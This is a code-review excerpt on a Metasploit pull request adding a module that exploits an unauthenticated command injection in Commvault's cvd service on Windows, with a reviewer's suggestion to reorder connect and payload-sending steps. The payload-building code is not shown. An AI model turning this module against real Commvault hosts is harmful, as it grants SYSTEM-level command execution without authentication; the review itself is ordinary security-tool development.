modules/exploits/windows/misc/commvault_cmd_exec.rb

```diff
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Commvault Communications Service (cvd) Command Injection',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability
+        discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
+        and v10). The vulnerability exists in the cvd.exe service and allows an
+        attacker to execute arbitrary commands in the context of the service. By
+        default, the Commvault Communications service installs and runs as SYSTEM in 
+        Windows and does not require authentication. This vulnerability was discovered 
+        in the Windows version. The Linux version wasn't tested.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
+            {
+              'Arch' => [ARCH_X64, ARCH_X86]
+            }
+          ],
+        ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 12 2017'))
+
+      register_options(
+        [
+          Opt::RPORT(8400),
+        ])
+    end
+
+  def exploit 
+
+    print_status("Executing payload")
```

Comment:
`Executing payload` should probably go after the `connect` method and `Connected to Commvault Communications Service` message.

Perhaps consider:

```ruby
    # Connect
    print_status("Connecting to Commvault Communications Service.")
    connect

    # Send the payload
    print_status("Executing payload")
    sock.put(buf)
```